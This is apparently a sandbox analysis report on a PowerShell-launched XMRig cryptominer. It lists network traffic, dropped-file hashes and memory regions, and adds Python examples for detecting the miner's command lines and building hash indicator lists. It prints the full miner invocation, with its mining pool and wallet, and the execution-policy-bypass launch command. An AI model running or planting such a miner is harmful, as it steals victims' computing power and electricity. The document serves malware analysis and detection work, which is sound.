| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
memory/5112-0-0x00007FFE3EE63000-0x00007FFE3EE65000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x54asuax.goe.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5112-10-0x00007FFE3EE60000-0x00007FFE3F921000-memory.dmp
memory/5112-11-0x000002105D960000-0x000002105D982000-memory.dmp
memory/5112-12-0x00007FFE3EE60000-0x00007FFE3F921000-memory.dmp
memory/5112-14-0x00007FFE3EE60000-0x00007FFE3F921000-memory.dmp
memory/5112-15-0x000002105D9F0000-0x000002105DA02000-memory.dmp
memory/5112-16-0x000002105D9E0000-0x000002105D9EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2640-47-0x00000157306E0000-0x0000015730700000-memory.dmp
memory/2640-48-0x0000015730720000-0x0000015730740000-memory.dmp
memory/2640-49-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-53-0x0000015730740000-0x0000015730760000-memory.dmp
memory/2640-52-0x0000015730760000-0x0000015730780000-memory.dmp
memory/2640-50-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/5112-51-0x00007FFE3EE60000-0x00007FFE3F921000-memory.dmp
memory/5112-54-0x00007FFE3EE63000-0x00007FFE3EE65000-memory.dmp
memory/2640-55-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/5112-56-0x00007FFE3EE60000-0x00007FFE3F921000-memory.dmp
memory/2640-57-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-59-0x0000015730740000-0x0000015730760000-memory.dmp
memory/2640-58-0x0000015730760000-0x0000015730780000-memory.dmp
memory/2640-60-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-61-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-62-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-63-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-64-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-65-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-66-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-67-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-68-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-69-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-70-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-71-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-72-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-73-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-74-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-75-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-76-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-77-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-78-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-79-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-80-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-81-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-82-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-83-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-84-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-85-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-86-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-87-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-88-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-89-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-90-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-91-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-92-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-93-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-94-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-95-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-96-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-97-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-98-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-99-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-100-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-101-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-102-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-103-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-104-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-105-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-106-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-107-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-108-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-109-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-110-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-111-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-112-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-113-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-114-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-115-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-116-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-117-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-118-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:19
Platform
win10v2004-20240426-en
Max time kernel
1798s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 736 wrote to memory of 2904 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 736 wrote to memory of 2904 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
memory/736-0-0x00007FF950D53000-0x00007FF950D55000-memory.dmp
memory/736-1-0x00000138AC820000-0x00000138AC842000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wp20rj5i.s0o.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/736-11-0x00007FF950D50000-0x00007FF951811000-memory.dmp
memory/736-12-0x00007FF950D50000-0x00007FF951811000-memory.dmp
memory/736-14-0x00007FF950D50000-0x00007FF951811000-memory.dmp
memory/736-15-0x00000138AD5E0000-0x00000138AD5F2000-memory.dmp
memory/736-16-0x00000138AC870000-0x00000138AC87A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2904-47-0x000001DF1BB40000-0x000001DF1BB60000-memory.dmp
memory/2904-48-0x000001DF1BB90000-0x000001DF1BBB0000-memory.dmp
memory/2904-49-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-52-0x000001DF1BBD0000-0x000001DF1BBF0000-memory.dmp
memory/2904-51-0x000001DF1BBB0000-0x000001DF1BBD0000-memory.dmp
memory/2904-50-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/736-53-0x00007FF950D53000-0x00007FF950D55000-memory.dmp
memory/736-54-0x00007FF950D50000-0x00007FF951811000-memory.dmp
memory/2904-55-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/736-56-0x00007FF950D50000-0x00007FF951811000-memory.dmp
memory/2904-59-0x000001DF1BBD0000-0x000001DF1BBF0000-memory.dmp
memory/2904-58-0x000001DF1BBB0000-0x000001DF1BBD0000-memory.dmp
memory/2904-57-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-{60..118}-0x00007FF793AD0000-0x00007FF794703000-memory.dmp (59 consecutive dumps, indices 60 through 118, all of the same region)
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:21
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
64 matches recorded; the sandbox lists no description, indicator, process or target for any of them.
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4536 wrote to memory of 4564 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4536 wrote to memory of 4564 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
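The two command lines in the Processes section (the PowerShell launcher and the xmrig.exe invocation, repeated in behavioral20 and behavioral26 with only the script name and PIDs changed) are the most reusable detection material in this report: the pool connection goes to rx.unmineable.com on 443 over stratum+ssl, so it blends into ordinary HTTPS on the wire and is better caught at process creation or in DNS. The block below is an added example written for this page, not part of the sandbox output. It scores a process command line as it would arrive from Sysmon Event ID 1 or EDR process-creation telemetry for the indicators visible here: a stratum+ssl/stratum+tcp pool URL, xmrig's -a algorithm flag, a Monero wallet address (optionally in unmineable's XMR:<address>.<worker> form) and a PowerShell -ExecutionPolicy bypass -File launch of a .ps1 from the user's Temp directory. The pool host and IP are copied from the Network table and the sample command lines from the Processes section; the score weights, thresholds and function names are the example's own choices, and the benign git command line is constructed.

```python
"""Score process command lines for the XMRig/unmineable chain in this report.

Added example for this report, not part of the sandbox output. Input is the
command line as recorded by Sysmon Event ID 1 or EDR process-creation events.
"""
import re

# Indicators copied from the report's Processes and Network sections.
POOL_HOSTS = {"rx.unmineable.com"}
POOL_IPS = {"161.35.34.195"}

# stratum+ssl://host:port or stratum+tcp://host:port (xmrig's -o argument).
STRATUM_RE = re.compile(r"stratum\+(?:ssl|tcp)://([A-Za-z0-9.\-]+):(\d+)", re.I)
# xmrig algorithm selector: "-a rx", "--algo=rx/0", "-a cn/r", ...
ALGO_RE = re.compile(r"(?:^|\s)(?:-a|--algo)[\s=]+(rx(?:/\S+)?|cn(?:/\S+)?)", re.I)
# Monero address: '4' followed by 94 base58 characters (95 total). unmineable
# wraps it as "XMR:<address>.<worker>", hence the optional prefix and lookahead.
XMR_ADDR_RE = re.compile(
    r"\b(?:XMR:)?(4[1-9A-HJ-NP-Za-km-z]{94})(?![1-9A-HJ-NP-Za-km-z])")
PS_BYPASS_RE = re.compile(r"-executionpolicy\s+bypass\b", re.I)
PS_FILE_RE = re.compile(r'-file\s+"?([^"]+?\.ps1)"?', re.I)
USER_TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)

# Constructed inputs: the two command lines from this report plus a benign one.
SAMPLE_CMDLINES = {
    "powershell": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"',
    "xmrig": r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x',
    "benign": r'"C:\Program Files\Git\cmd\git.exe" fetch --all',
}


def image_path(cmd: str) -> str:
    """First argv token: a quoted path, or everything up to the first space."""
    cmd = cmd.lstrip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ", 1)[0]


def score_cmdline(cmd: str) -> dict:
    """Return {'score', 'reasons', 'wallet', 'pool'} for one command line."""
    score, reasons, wallet, pool = 0, [], None, None

    m = STRATUM_RE.search(cmd)
    if m:
        host = m.group(1).lower()
        pool = f"{host}:{m.group(2)}"
        score += 50
        reasons.append(f"stratum pool URL {pool}")
        if host in POOL_HOSTS or host in POOL_IPS:
            score += 30
            reasons.append("pool host/IP listed in this report")

    m = ALGO_RE.search(cmd)
    if m:
        score += 20
        reasons.append(f"xmrig algorithm flag {m.group(1)}")

    m = XMR_ADDR_RE.search(cmd)
    if m:
        wallet = m.group(1)
        score += 40
        reasons.append("Monero wallet address on the command line")

    if PS_BYPASS_RE.search(cmd):
        score += 15
        reasons.append("PowerShell -ExecutionPolicy bypass")
        f = PS_FILE_RE.search(cmd)
        if f and USER_TEMP_RE.search(f.group(1)):
            score += 15
            reasons.append(f"script executed from user Temp: {f.group(1)}")

    if USER_TEMP_RE.search(image_path(cmd)):
        score += 10
        reasons.append("executable itself runs from user Temp")

    return {"score": score, "reasons": reasons, "wallet": wallet, "pool": pool}


def verdict(score: int) -> str:
    """Example thresholds: a pool URL or a wallet alone is already a miner."""
    return "miner" if score >= 60 else "suspicious" if score >= 15 else "benign"


if __name__ == "__main__":
    for name, cmd in SAMPLE_CMDLINES.items():
        r = score_cmdline(cmd)
        print(f"{name:10} {verdict(r['score']):10} {r['score']:4} {'; '.join(r['reasons'])}")
```

The PowerShell line alone only reaches "suspicious": an execution-policy bypass on a script in %TEMP% is common in legitimate deployment tooling, so the miner verdict is driven by the child process, and the parent-child pair (powershell.exe writing into xmrig.exe, as the WriteProcessMemory rows record) is what an alert should join on.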
Files
memory/4536-3-0x00007FFC0C723000-0x00007FFC0C724000-memory.dmp
memory/4536-5-0x000002266F6C0000-0x000002266F6E2000-memory.dmp
memory/4536-8-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp
memory/4536-9-0x000002266F9A0000-0x000002266FA16000-memory.dmp
memory/4536-10-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lbtuaadq.dhw.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4536-25-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp
memory/4536-61-0x000002266F980000-0x000002266F98A000-memory.dmp
memory/4536-48-0x000002266FC20000-0x000002266FC32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4564-90-0x000002B925120000-0x000002B925140000-memory.dmp
memory/4536-91-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp
memory/4536-93-0x00007FFC0C723000-0x00007FFC0C724000-memory.dmp
memory/4564-92-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4536-94-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp
memory/4564-{95..156}-0x00007FF678BF0000-0x00007FF679823000-memory.dmp (62 consecutive dumps, indices 95 through 156, all of the same region)
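Two things in the Files sections matter when turning this report into indicators. First, the dropped C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe carries the same MD5/SHA1/SHA256/SHA512 in every detonation, so one hash entry covers all runs. Second, the __PSScriptPolicyTest_*.ps1 files are written by powershell.exe itself when it tests the AppLocker/WDAC script policy on start-up; they are not attacker artifacts and must not be blocklisted. The set c4ca4238a0b923820dcc509a6f75849b / 356a192b7913b04c54574d18c28d46e6395428ab / 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b seen in behavioral18 is the MD5 / SHA1 / SHA256 of the single character "1", which the block below confirms. The block is an added example for this page, not part of the sandbox output: it parses file/hash blocks in the layout used above, drops the policy-test probes, de-duplicates across detonations and keys the result by SHA256. Its sample input is constructed from the behavioral18 and behavioral20 Files sections; the function names and the output shape are the example's own.

```python
"""Build a file-hash IOC list from the Files sections of this sandbox report.

Added example for this report, not part of the sandbox output. It parses the
"<path> / | MD5 | ... | / ... / | SHA512 | ... |" blocks, drops PowerShell's own
__PSScriptPolicyTest_*.ps1 probes (powershell.exe writes one on start-up to test
the AppLocker/WDAC script policy; they are not attacker artifacts), de-duplicates
across detonations and keys the result by SHA256.
"""
import hashlib
import re

HASH_ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
PATH_RE = re.compile(r"^[A-Za-z]:\\")          # a Windows path line opens a file block
POLICY_PROBE_RE = re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.ps1$", re.I)
EXPECTED_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Constructed input: file blocks copied from the behavioral18 and behavioral20
# Files sections of this report (xmrig.exe appears once per detonation).
SAMPLE_REPORT = r"""
memory/4536-3-0x00007FFC0C723000-0x00007FFC0C724000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lbtuaadq.dhw.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4536-25-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4564-90-0x000002B925120000-0x000002B925140000-memory.dmp
Analysis: behavioral20
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_na2oneoe.kg5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
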